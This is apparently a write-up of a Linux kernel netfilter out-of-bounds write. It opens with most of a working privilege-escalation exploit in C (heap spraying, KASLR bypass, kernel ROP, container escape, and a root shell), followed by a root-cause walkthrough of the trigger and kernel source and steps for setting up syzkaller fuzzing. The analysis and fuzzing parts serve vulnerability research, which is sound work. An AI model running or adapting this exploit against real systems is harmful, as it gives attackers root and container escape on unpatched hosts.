  // Reclaim the previously freed secondary message with a fake msg_msg of
  // maximum possible size.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
                PAGE_SIZE - MSG_MSG_SIZE, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;
 
  // Use the fake secondary message to read out-of-bounds.
  printf("[*] Leaking adjacent secondary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;
 
  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[SECONDARY_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak adjacent secondary message.\n");
    goto err_rmid;
  }
 
  // The secondary message contains a pointer to the primary message.
  msg = (struct msg_msg *)&msg_fake.mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (PRIMARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
 
  if ((kheap_addr & 0xFFFF000000000000) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;
  }
 
  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));
 
  // Put kheap_addr at next to leak its content. Assumes zero bytes before
  // kheap_addr.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, 0x41414141, 0x42424242,
                sizeof(msg_fake.mtext), kheap_addr - MSG_MSGSEG_SIZE);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;
 
  // Use the fake secondary message to read from kheap_addr.
  printf("[*] Leaking primary message...\n");
  if (peek_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), 1) < 0)
    goto err_rmid;
 
  // Check if the leak is valid.
  if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) {
    printf("[-] Error could not leak primary message.\n");
    goto err_rmid;
  }
 
  // The primary message contains a pointer to the secondary message.
  msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
  kheap_addr = msg->m_list_next;
  if (kheap_addr & (SECONDARY_SIZE - 1))
    kheap_addr = msg->m_list_prev;
 
  // Calculate the address of the fake secondary message.
  kheap_addr -= SECONDARY_SIZE;
  printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr);
 
  if ((kheap_addr & 0xFFFF00000000FFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel heap address is incorrect.\n");
    goto err_rmid;
  }
 
  printf("\n");
  printf("[+] STAGE 3: KASLR bypass\n");
 
  printf("[*] Freeing fake secondary messages...\n");
  free_skbuff(ss, secondary_buf, sizeof(secondary_buf));
 
  // Put kheap_addr at m_list_next & m_list_prev so that list_del() is possible.
  printf("[*] Spraying fake secondary messages...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  build_msg_msg((void *)secondary_buf, kheap_addr, kheap_addr, 0, 0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;
 
  printf("[*] Freeing sk_buff data buffer...\n");
  if (read_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
    goto err_rmid;
 
  printf("[*] Spraying pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (pipe(pipefd[i]) < 0) {
      perror("[-] pipe");
      goto err_rmid;
    }
    // Write something to populate pipe_buffer.
    if (write(pipefd[i][1], "pwn", 3) < 0) {
      perror("[-] write");
      goto err_rmid;
    }
  }
 
  printf("[*] Leaking and freeing pipe_buffer object...\n");
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) {
        perror("[-] read");
        goto err_rmid;
      }
      if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
        pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
    }
  }
 
  kbase_addr = pipe_buffer_ops - ANON_PIPE_BUF_OPS;
  printf("[+] anon_pipe_buf_ops: %" PRIx64 "\n", pipe_buffer_ops);
  printf("[+] kbase_addr: %" PRIx64 "\n", kbase_addr);
 
  if ((kbase_addr & 0xFFFF0000000FFFFF) != 0xFFFF000000000000) {
    printf("[-] Error kernel base address is incorrect.\n");
    goto err_rmid;
  }
 
  printf("\n");
  printf("[+] STAGE 4: Kernel code execution\n");
 
  printf("[*] Spraying fake pipe_buffer objects...\n");
  memset(secondary_buf, 0, sizeof(secondary_buf));
  buf = (struct pipe_buffer *)&secondary_buf;
  buf->ops = kheap_addr + 0x290;
  ops = (struct pipe_buf_operations *)&secondary_buf[0x290];
#ifdef KERNEL_COS_5_4_89
  // RAX points to &buf->ops.
  // RCX points to &buf.
  ops->release = kbase_addr + PUSH_RAX_JMP_QWORD_PTR_RCX;
#elif KERNEL_UBUNTU_5_8_0_48
  // RSI points to &buf.
  ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39;
#endif
  build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0);
  if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
    goto err_rmid;
 
  // Trigger pipe_release().
  printf("[*] Releasing pipe_buffer objects...\n");
  for (int i = 0; i < NUM_PIPEFDS; i++) {
    if (close(pipefd[i][0]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
    if (close(pipefd[i][1]) < 0) {
      perror("[-] close");
      goto err_rmid;
    }
  }
 
  printf("[*] Checking for root...\n");
  if ((fd = open("/etc/shadow", O_RDONLY)) < 0) {
    printf("[-] Error could not gain root privileges.\n");
    goto err_rmid;
  }
  close(fd);
  printf("[+] Root privileges gained.\n");
 
  printf("\n");
  printf("[+] STAGE 5: Post-exploitation\n");
 
  printf("[*] Escaping container...\n");
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);
 
  printf("[*] Cleaning up...\n");
  for (int i = 0; i < NUM_MSQIDS; i++) {
    // TODO: Fix next pointer.
    if (i == fake_idx)
      continue;
    if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
      perror("[-] msgctl");
  }
  for (int i = 0; i < NUM_SOCKETS; i++) {
    if (close(ss[i][0]) < 0)
      perror("[-] close");
    if (close(ss[i][1]) < 0)
      perror("[-] close");
  }
  if (close(s) < 0)
    perror("[-] close");
 
  printf("[*] Popping root shell...\n");
  char *args[] = {"/bin/bash", "-i", NULL};
  execve(args[0], args, NULL);
 
  return 0;
 
err_rmid:
  for (int i = 0; i < NUM_MSQIDS; i++) {
    if (i == fake_idx)
      continue;
    if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
      perror("[-] msgctl");
  }
 
err_no_rmid:
  return 1;
}

The program is compiled as follows:

gcc poc.c -m32 -o poc

Reading the exploit and analyzing the root cause

#define NUM_MSQIDS 4096
 
for (int i = 0; i < NUM_MSQIDS; i++) {
  if ((msqid[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) {
    perror("[-] msgget");
    goto err_no_rmid;
  }
}

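Creating 4096 message queues is mainly about making the heap spray, and therefore the exploit, reliable (more on this later). Heap-spray write-ups usually say that the more objects you spray, the more stable the exploit becomes, but few explain why. I think the explanation on CTF Wiki fits here: kernel code may run on different CPU cores, and the SLUB allocator serves each core from its own per-CPU slabs. If too few objects are sprayed, the spray may run on CPU0 while the later exploitation steps run on CPU1, and the exploit fails.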

int setup_sandbox(void) {
  if (unshare(CLONE_NEWUSER) < 0) {
    perror("[-] unshare(CLONE_NEWUSER)");
    return -1;
  }
  if (unshare(CLONE_NEWNET) < 0) {
    perror("[-] unshare(CLONE_NEWNET)");
    return -1;
  }
 
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(0, &set);
  if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
    perror("[-] sched_setaffinity");
    return -1;
  }
 
  return 0;
}
 
printf("[*] Setting up namespace sandbox...\n");
if (setup_sandbox() < 0)
  goto err_no_rmid;

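This part at the start of main also serves stability: it pins the process to a fixed core so that the spray and the later steps use the same per-CPU slabs. The two unshare() calls put the process into a new user namespace and a new network namespace, where it holds the CAP_NET_ADMIN capability needed for the setsockopt call used later.

Next, the primary and secondary messages are created and filled with data.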

int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) {
  *(long *)msgp = msgtyp;
  if (msgsnd(msqid, msgp, msgsz - sizeof(long), 0) < 0) {
    perror("[-] msgsnd");
    return -1;
  }
  return 0;
}
 
printf("[*] Spraying primary messages...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
  memset(&msg_primary, 0, sizeof(msg_primary));
  *(int *)&msg_primary.mtext[0] = MSG_TAG;
  *(int *)&msg_primary.mtext[4] = i;
  if (write_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
    goto err_rmid;
}
 
printf("[*] Spraying secondary messages...\n");
for (int i = 0; i < NUM_MSQIDS; i++) {
  memset(&msg_secondary, 0, sizeof(msg_secondary));
  *(int *)&msg_secondary.mtext[0] = MSG_TAG;
  *(int *)&msg_secondary.mtext[4] = i;
  if (write_msg(msqid[i], &msg_secondary, sizeof(msg_secondary),
                MTYPE_SECONDARY) < 0)
    goto err_rmid;
}

mtext[0] = MSG_TAG marks the buffer as one of the sprayed messages.

mtext[4] = i records the index of the message queue the message belongs to.
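The tagging scheme can be sketched in isolation. The snippet below is a minimal illustration, not code from the exploit: the value of MSG_TAG and the helper names tag_message and check_message are assumptions made for this example. It shows how a tag plus a queue index lets a later read tell whether a message still belongs to the queue it was read from.

```c
#include <stdint.h>
#include <string.h>

/* Assumed tag value; the exploit defines MSG_TAG elsewhere. */
#define MSG_TAG 0xAAAAAAAAu

/* Stamp a message body with the tag and the index of its queue. */
void tag_message(char *mtext, uint32_t queue_idx) {
  uint32_t tag = MSG_TAG;
  memcpy(mtext, &tag, sizeof(tag));
  memcpy(mtext + 4, &queue_idx, sizeof(queue_idx));
}

/*
 * Inspect a message body that was read from queue `expected_idx`.
 * Returns -1 if the body does not carry the tag,
 *          0 if it carries the expected index,
 *          1 if it carries the index of a different queue.
 * When the tag matches, the index found is stored in *found_idx.
 */
int check_message(const char *mtext, uint32_t expected_idx,
                  uint32_t *found_idx) {
  uint32_t tag, idx;
  memcpy(&tag, mtext, sizeof(tag));
  memcpy(&idx, mtext + 4, sizeof(idx));
  if (tag != MSG_TAG)
    return -1;
  *found_idx = idx;
  return idx == expected_idx ? 0 : 1;
}
```

A return value of 1 is the interesting case: the message read through one queue carries another queue's index, which means two queues reference the same secondary message.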

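At this point the message queues should be laid out as in the figure below.

2.png

The figure is taken from the official write-up (mainly because I could not find good drawing software).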
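Why the primary and secondary messages end up in different slab caches can be checked with a little arithmetic. The sketch below rests on assumptions that are not stated in this part of the article: a struct msg_msg header of 0x30 bytes on x86-64, PRIMARY_SIZE = 0x1000 and SECONDARY_SIZE = 0x400. The power-of-two rounding in kmalloc_bucket is also a simplification of the real kmalloc size classes.

```c
#include <stddef.h>

/* Assumed values; see the lead-in above. */
#define MSG_MSG_HDR 0x30u      /* sizeof(struct msg_msg) on x86-64 */
#define PRIMARY_SIZE 0x1000u   /* intended slab object size, primary */
#define SECONDARY_SIZE 0x400u  /* intended slab object size, secondary */

/* Largest message body that keeps header + body inside one object. */
size_t mtext_len(size_t object_size) {
  return object_size - MSG_MSG_HDR;
}

/* Simplified size class: next power of two (ignores kmalloc-96/192). */
size_t kmalloc_bucket(size_t n) {
  size_t bucket = 8;
  while (bucket < n)
    bucket <<= 1;
  return bucket;
}
```

Under these assumptions, kmalloc_bucket(MSG_MSG_HDR + mtext_len(PRIMARY_SIZE)) is 0x1000 and the same expression with SECONDARY_SIZE is 0x400, so each kind of message fills exactly one object of its own cache.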

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}
 
printf("[*] Creating holes in primary messages...\n");
for (int i = HOLE_STEP; i < NUM_MSQIDS; i += HOLE_STEP) {
  if (read_msg(msqid[i], &msg_primary, sizeof(msg_primary), MTYPE_PRIMARY) < 0)
    goto err_rmid;
}

Next, some of the primary messages are freed. In fact only three are freed: those of queues 1024, 2048 and 3072.
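The three indices follow directly from the loop bounds. As a small check, the sketch below replays the loop without touching any message queue; HOLE_STEP = 1024 is an assumption inferred from the indices listed above, and hole_indices is a helper name invented for this example.

```c
#include <stddef.h>

#define NUM_MSQIDS 4096
#define HOLE_STEP 1024 /* assumed: implied by the indices 1024, 2048, 3072 */

/*
 * Collect the queue indices whose primary message would be received
 * (and therefore freed). Returns how many indices the loop visits;
 * at most `cap` of them are stored in `out`.
 */
size_t hole_indices(int num_queues, int step, int *out, size_t cap) {
  size_t n = 0;
  if (step <= 0)
    return 0;
  for (int i = step; i < num_queues; i += step) {
    if (n < cap)
      out[n] = i;
    n++;
  }
  return n;
}
```

Calling hole_indices(NUM_MSQIDS, HOLE_STEP, out, 8) yields three entries. Queue 0 is skipped because the loop starts at step, and 4096 is excluded by the upper bound.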

int trigger_oob_write(int s) {
  struct __attribute__((__packed__)) {
    struct ipt_replace replace;
    struct ipt_entry entry;
    struct xt_entry_match match;
    char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];
    struct xt_entry_target target;
  } data = {0};
 
  data.replace.num_counters = 1;
  data.replace.num_entries = 1;
  data.replace.size = (sizeof(data.entry) + sizeof(data.match) +
                       sizeof(data.pad) + sizeof(data.target));
 
  data.entry.next_offset = (sizeof(data.entry) + sizeof(data.match) +
                            sizeof(data.pad) + sizeof(data.target));
  data.entry.target_offset =
      (sizeof(data.entry) + sizeof(data.match) + sizeof(data.pad));
 
  data.match.u.user.match_size = (sizeof(data.match) + sizeof(data.pad));
  strcpy(data.match.u.user.name, "icmp");
  data.match.u.user.revision = 0;
 
  data.target.u.user.target_size = sizeof(data.target);
  strcpy(data.target.u.user.name, "NFQUEUE");
  data.target.u.user.revision = 1;
 
  // Partially overwrite the adjacent buffer with 2 bytes of zero.
  if (setsockopt(s, SOL_IP, IPT_SO_SET_REPLACE, &data, sizeof(data)) != 0) {
    if (errno == ENOPROTOOPT) {
      printf("[-] Error ip_tables module is not loaded.\n");
      return -1;
    }
  }
  return 0;
}
 
printf("[*] Triggering out-of-bounds write...\n");
if (trigger_oob_write(s) < 0)
  goto err_rmid;

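Calling setsockopt(IPT_SO_SET_REPLACE) triggers the overflow directly: two zero bytes are written past the end of the buffer. The 4096 message queues were created back to back so that their messages occupy contiguous memory, and what matters most is that the secondary messages are contiguous. The two zero bytes land on the start of the adjacent primary message, which clears the low two bytes of that message's pointer to its secondary message. Provided those two bytes were not already zero, two primary messages now point to the same secondary message, and the layout in the figure above turns into the one below.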

4.png
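The effect of the two zero bytes on a pointer can be reproduced with plain integer arithmetic. This is a minimal sketch assuming a little-endian machine such as x86-64, where the first two bytes in memory are the low 16 bits of the value. The addresses in the usage note are made up for illustration, and both function names are hypothetical.

```c
#include <stdint.h>

/* Result of overwriting the first two bytes of a little-endian
 * 64-bit pointer with zeros: the low 16 bits are cleared. */
uint64_t zero_low_two_bytes(uint64_t ptr) {
  return ptr & ~(uint64_t)0xFFFF;
}

/* Returns 1 if, after the overwrite, the victim's pointer equals a
 * pointer that another primary message already holds. */
int collide_after_overwrite(uint64_t victim_next, uint64_t other_next) {
  return zero_low_two_bytes(victim_next) == other_next;
}
```

For example, a pointer of 0xffff8881e4c93400 becomes 0xffff8881e4c90000. If another primary message already points at 0xffff8881e4c90000, both now reference the same secondary message. A pointer whose low two bytes were already zero is unchanged, which is the case excluded above.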

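Some tutorials describe an intermediate state during the trigger, shown in the figure below.

3.png

Judging by how the bug works and how it is triggered, I do not think this state needs special attention. Inside setsockopt the kernel does first allocate the xt_table_info and only then overflows by two bytes while padding to an 8-byte boundary, but from user space the overflow has simply happened by the time setsockopt returns. The intermediate state is very short-lived and can be ignored, although it does help in understanding how the overflow comes about.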

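At this point the bug has been triggered. From the steps so far, triggering it requires several conditions. First, the code must be compiled as a 32-bit program and run on a 64-bit system. Second, the x_tables and ip6_tables kernel modules must be built. Finally, the setsockopt call must carry some specially crafted fields. A setsockopt(IPT_SO_SET_REPLACE) call made by a 32-bit process ends up in the kernel's __compat_sys_setsockopt function, which is also visible in the KASAN output shown earlier: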

[ 1185.206655]  __compat_sys_setsockopt+0x139/0x330
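The first condition (a 32-bit process on a 64-bit kernel) can be tested before attempting the trigger. The helper below is a hypothetical sketch, not part of the exploit; it only encodes the decision and leaves gathering the inputs to the caller.

```c
#include <stddef.h>
#include <string.h>

/*
 * Returns 1 when a process with the given pointer size runs on an
 * x86-64 kernel, i.e. when its system calls go through the compat
 * entry points. `kernel_machine` is the machine string reported by
 * the kernel.
 */
int runs_in_compat_mode(size_t pointer_size, const char *kernel_machine) {
  return pointer_size == 4 && strcmp(kernel_machine, "x86_64") == 0;
}
```

In a real program the arguments would typically be sizeof(void *) and the machine field filled in by uname(2). Note that the reported machine string can differ if the process personality has been changed, so this is a heuristic rather than a guarantee.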

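The kernel call path of setsockopt is very complicated (and I am not skilled enough to cover it), and it is unrelated to the bug itself (a basic understanding is still worthwhile, since it deepens one's knowledge of the Linux kernel), so the analysis starts directly at the vulnerable code.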

[ 1185.205993] BUG: KASAN: slab-out-of-bounds in xt_compat_target_from_user+0x20a/0x4c0 [x_tables]
[ 1185.206433]  compat_do_replace.isra.0+0x160/0x380 [ip6_tables]

The problem is already present from compat_do_replace onward and is triggered in xt_compat_target_from_user.

First, the code of compat_do_replace:

static int
compat_do_replace(struct net *net, void __user *user, unsigned int len)
{
    int ret;
    struct compat_ip6t_replace tmp;
    struct xt_table_info *newinfo;
    void *loc_cpu_entry;
    struct ip6t_entry *iter;
 
    if (copy_from_user(&tmp, user, sizeof(tmp)) != 0)
        return -EFAULT;
 
    /* overflow check */
    if (tmp.num_counters >= INT_MAX / sizeof(struct xt_counters))
        return -ENOMEM;
    if (tmp.num_counters == 0)
        return -EINVAL;
 
    tmp.name[sizeof(tmp.name)-1] = 0;
 
    newinfo = xt_alloc_table_info(tmp.size);
    if (!newinfo)
        return -ENOMEM;
 
    loc_cpu_entry = newinfo->entries;
    if (copy_from_user(loc_cpu_entry, user + sizeof(tmp),
               tmp.size) != 0) {
        ret = -EFAULT;
        goto free_newinfo;
    }
 
    ret = translate_compat_table(net, &newinfo, &loc_cpu_entry, &tmp);
    if (ret != 0)
        goto free_newinfo;
 
    ret = __do_replace(net, tmp.name, tmp.valid_hooks, newinfo,
               tmp.num_counters, compat_ptr(tmp.counters));
    if (ret)
        goto free_newinfo_untrans;
    return 0;
 
 free_newinfo_untrans:
    xt_entry_foreach(iter, loc_cpu_entry, newinfo->size)
        cleanup_entry(iter, net);
 free_newinfo:
    xt_free_table_info(newinfo);
    return ret;
}

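Compared with the trigger code in trigger_oob_write above, struct compat_ip6t_replace tmp corresponds to the replace member of data. The exploit declares it as struct ipt_replace because it uses the IPv4 interface; the kernel code shown here is the IPv6 variant of the same logic.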

struct xt_table_info *xt_alloc_table_info(unsigned int size)
{
    struct xt_table_info *info = NULL;
    size_t sz = sizeof(*info) + size;
 
    if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE)
        return NULL;
 
    info = kvmalloc(sz, GFP_KERNEL_ACCOUNT);
    if (!info)
        return NULL;
 
    memset(info, 0, sizeof(*info));
    info->size = size;
    return info;
}
EXPORT_SYMBOL(xt_alloc_table_info);

Note the kvmalloc here. It is related to the cause of the bug and comes up again later.

newinfo is the xt_table_info header followed by these structures:

struct ipt_entry entry;
struct xt_entry_match match;
char pad[0x108 + PRIMARY_SIZE - 0x200 - 0x2];
struct xt_entry_target target;
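The size handed to kvmalloc follows from this layout: the fixed header plus the user-supplied blob. The sketch below mirrors the header in user space to make the arithmetic checkable. The struct name xt_table_info_mirror and the function table_alloc_size are made up for this example, NF_INET_NUMHOOKS is taken to be 5, and the 512 MiB limit for XT_MAX_TABLE_SIZE is an assumption about the kernel's definition.

```c
#include <stddef.h>

#define NF_INET_NUMHOOKS 5
/* Assumed to match the kernel's limit of 512 MiB. */
#define XT_MAX_TABLE_SIZE (512u * 1024 * 1024)

/* User-space mirror of the kernel's xt_table_info header. */
struct xt_table_info_mirror {
  unsigned int size;
  unsigned int number;
  unsigned int initial_entries;
  unsigned int hook_entry[NF_INET_NUMHOOKS];
  unsigned int underflow[NF_INET_NUMHOOKS];
  unsigned int stacksize;
  void ***jumpstack;
  unsigned char entries[] __attribute__((aligned(8)));
};

/*
 * Bytes requested for a rule blob of `size` bytes, following the same
 * checks as xt_alloc_table_info. Returns 0 when the request would be
 * rejected.
 */
size_t table_alloc_size(unsigned int size) {
  size_t hdr = sizeof(struct xt_table_info_mirror);
  size_t sz = hdr + size;
  if (sz < hdr || sz >= XT_MAX_TABLE_SIZE)
    return 0;
  return sz;
}
```

With GCC or Clang on x86 the entries array starts at offset 64 (0x40), so a blob of size bytes leads to a request of 0x40 + size bytes. Note that the request is not rounded up to a multiple of 8.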

Finally, the &loc_cpu_entry pointer passed to translate_compat_table points to entries, the flexible array member of xt_table_info.

/* The table itself */
struct xt_table_info {
    /* Size per table */
    unsigned int size;
    /* Number of entries: FIXME. --RR */
    unsigned int number;
    /* Initial number of entries. Needed for module usage count */
    unsigned int initial_entries;
 
    /* Entry points and underflows */
    unsigned int hook_entry[NF_INET_NUMHOOKS];
    unsigned int underflow[NF_INET_NUMHOOKS];
 
    /*
     * Number of user chains. Since tables cannot have loops, at most
     * @stacksize jumps (number of user chains) can possibly be made.
     */
    unsigned int stacksize;
    void ***jumpstack;
 
    unsigned char entries[] __aligned(8);
};

static int
translate_compat_table(struct net *net,
               struct xt_table_info **pinfo,
               void **pentry0,
               const struct compat_ip6t_replace *compatr)
{
    unsigned int i, j;
    struct xt_table_info *newinfo, *info;
    void *pos, *entry0, *entry1;
    struct compat_ip6t_entry *iter0;
    struct ip6t_replace repl;
    unsigned int size;
    int ret;
 
    info = *pinfo;
    entry0 = *pentry0;
    size = compatr->size;
    info->number = compatr->num_entries;
 
    j = 0;
    xt_compat_lock(AF_INET6);
    ret = xt_compat_init_offsets(AF_INET6, compatr->num_entries);
    if (ret)
        goto out_unlock;
    /* Walk through entries, checking offsets. */
    xt_entry_foreach(iter0, entry0, compatr->size) {
        ret = check_compat_entry_size_and_hooks(iter0, info, &size,
                            entry0,
                            entry0 + compatr->size);
        if (ret != 0)
            goto out_unlock;
        ++j;
    }
 
    ret = -EINVAL;
    if (j != compatr->num_entries)
        goto out_unlock;
 
    ret = -ENOMEM;
    newinfo = xt_alloc_table_info(size);
    if (!newinfo)
        goto out_unlock;
 
    newinfo->number = compatr->num_entries;
    for (i = 0; i < NF_INET_NUMHOOKS; i++) {
        newinfo->hook_entry[i] = compatr->hook_entry[i];
        newinfo->underflow[i] = compatr->underflow[i];
    }
    entry1 = newinfo->entries;
    pos = entry1;
    size = compatr->size;
    xt_entry_foreach(iter0, entry0, compatr->size)
        compat_copy_entry_from_user(iter0, &pos, &size,
                        newinfo, entry1);
 
    /* all module references in entry0 are now gone. */
    xt_compat_flush_offsets(AF_INET6);
    xt_compat_unlock(AF_INET6);
 
    memcpy(&repl, compatr, sizeof(*compatr));
 
    for (i = 0; i < NF_INET_NUMHOOKS; i++) {
        repl.hook_entry[i] = newinfo->hook_entry[i];
        repl.underflow[i] = newinfo->underflow[i];
    }
 
    repl.num_counters = 0;
    repl.counters = NULL;
    repl.size = newinfo->size;
    ret = translate_table(net, newinfo, entry1, &repl);
    if (ret)
        goto free_newinfo;
 
    *pinfo = newinfo;
    *pentry0 = entry1;
    xt_free_table_info(info);
    return 0;
 
free_newinfo:
    xt_free_table_info(newinfo);
    return ret;
out_unlock:
    xt_compat_flush_offsets(AF_INET6);
    xt_compat_unlock(AF_INET6);
    xt_entry_foreach(iter0, entry0, compatr->size) {
        if (j-- == 0)
            break;
        compat_release_entry(iter0);
    }
    return ret;
}

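Put simply, translate_compat_table receives the 32-bit structures in entry0, allocates a new table entry1 for the 64-bit structures (its size is entry0's size as adjusted by check_compat_entry_size_and_hooks), and converts entry0 into entry1. Note that the contents of entry0 are not changed; they are only converted from the 32-bit to the 64-bit representation. The KASAN output is incomplete from this point on. The call chain here should be translate_compat_table -> compat_copy_entry_from_user -> xt_compat_target_from_user. The function in the middle is not very important, since it mostly passes parameters along; the important one is xt_compat_target_from_user.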

void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                unsigned int *size)
{
    const struct xt_target *target = t->u.kernel.target;
    struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
    int pad, off = xt_compat_target_offset(target);
    u_int16_t tsize = ct->u.user.target_size;
    char name[sizeof(t->u.user.name)];
 
    t = *dstptr;
    memcpy(t, ct, sizeof(*ct));
    if (target->compat_from_user)
        target->compat_from_user(t->data, ct->data);
    else
        memcpy(t->data, ct->data, tsize - sizeof(*ct));
    pad = XT_ALIGN(target->targetsize) - target->targetsize;
    if (pad > 0)
        memset(t->data + target->targetsize, 0, pad);
 
    tsize += off;
    t->u.user.target_size = tsize;
    strlcpy(name, target->name, sizeof(name));
    module_put(target->me);
    strncpy(t->u.user.name, name, sizeof(t->u.user.name));
 
    *size += off;
    *dstptr += tsize;
}

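Pay attention to the pad variable here. It is computed so that the target data ends on an 8-byte boundary, but when xt_alloc_table_info allocated the memory above, the size was not rounded up to 8 bytes. As a result, the memset that zeroes the padding can write zeros into the next heap object (the effect of the overflow is shown in the figures above).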
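The padding arithmetic can be worked through in user space. In the sketch below, ALIGN8 stands in for the kernel's XT_ALIGN on x86-64, and a targetsize of 4 for the NFQUEUE revision 1 target is an assumption, chosen because it matches the "Write of size 4" line in the KASAN report at the top of the article. The offsets used in the usage note are hypothetical.

```c
#include <stddef.h>

/* Stand-in for XT_ALIGN on x86-64: round up to a multiple of 8. */
#define ALIGN8(x) (((x) + 7u) & ~7u)

/* Number of bytes the memset clears after the target's data. */
unsigned int target_pad(unsigned int targetsize) {
  return ALIGN8(targetsize) - targetsize;
}

/*
 * How many of the padding bytes fall beyond an allocation of
 * `alloc_len` bytes when the target's data starts at `data_off`.
 */
unsigned int pad_bytes_past_end(unsigned int alloc_len,
                                unsigned int data_off,
                                unsigned int targetsize) {
  unsigned int pad = target_pad(targetsize);
  unsigned int start = data_off + targetsize; /* first padding byte */
  unsigned int end = start + pad;             /* one past the last */
  if (end <= alloc_len)
    return 0;
  if (start >= alloc_len)
    return pad;
  return end - alloc_len;
}
```

With targetsize 4 the padding is 4 bytes. If the data starts 6 bytes before the end of a 0x1000-byte object, pad_bytes_past_end(0x1000, 0x1000 - 6, 4) is 2: two of the four zero bytes stay inside the object and two spill into the neighbour, which is the two-byte overwrite the exploit relies on.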

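The rough mechanism of the bug is now clear: it is reached by running 32-bit code that uses a socket on a 64-bit system (see trigger_oob_write for the trigger code). To find this bug with syzkaller, a 64-bit kernel therefore has to be fuzzed with 32-bit programs.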

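Fuzzing

System configuration

CPU virtualization must be enabled

8 GB of RAM (as much memory as possible)

40 GB of disk (according to what I read online, this should be enough)

Preparation

Install the required packages: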

apt-get install dwarves debootstrap make gcc flex bison libncurses-dev libelf-dev libssl-dev g++ git g++-multilib

Edit the .config file according to the error fixes suggested on GitHub and a few required options:

# Coverage collection.
CONFIG_KCOV=y
 
# Debug info for symbolization.
CONFIG_DEBUG_INFO_DWARF4=y
 
# Memory bug detector
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y
 
# Required for Debian Stretch and later
CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y
 
CONFIG_CMDLINE_BOOL=y
CONFIG_CMDLINE="net.ifnames=0"
 
CONFIG_BINFMT_MISC=y
CONFIG_FRAME_WARN=4096
CONFIG_SYSTEM_TRUSTED_KEYS=""
CONFIG_E1000=y
CONFIG_IP6_NF_IPTABLES=y

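Some source code also needs to be changed.

Comment out line 392 of /include/linux/compiler.h. I do not know why this error is triggered; the line is still present in newer kernel versions, so it may be something peculiar to my machine.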

//_compiletime_assert(condition, msg, __compiletime_assert_, __COUNTER__)

Change the if block at line 356 of /tools/objtool/elf.c so that it simply returns 0. This follows a patch posted on GitHub, and newer kernel versions in fact also return 0 here.

if (!symtab) {
    //WARN("missing symbol table");
    //return -1;
    return 0;
}

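The source changes above are required when building the 5.8.1 kernel on Ubuntu 22.04. On 20.04 no source changes are needed; editing the .config file is enough.

Next, the syzkaller source needs a small change.

Find the qemu.go file and change the following: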

"linux/386": {
        Qemu:   "qemu-system-i386",
        NetDev: "e1000",
        RngDev: "virtio-rng-pci",
        CmdLine: []string{
                "root=/dev/sda",
                "console=ttyS0",
        },
},

to:

"linux/386": {
        Qemu:   "qemu-system-x86_64",
        NetDev: "e1000",
        RngDev: "virtio-rng-pci",
        CmdLine: []string{
                "root=/dev/sda",
                "console=ttyS0",
        },
},

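After the change syzkaller has to be rebuilt; once it is built it can be run directly.

Before running it, write a syzkaller configuration file and download the script that creates the disk image: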

wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh

{
    "target": "linux/386",
    "http": "0.0.0.0:8080",
    "workdir": "/root/image/ip6/",
    "kernel_obj": "/root/linux-5.8.1/",
    "image": "/root/image/bullseye.img",
    "sshkey": "/root/image/bullseye.id_rsa",
    "syzkaller": "/root/syzkaller",
    "procs": 2,
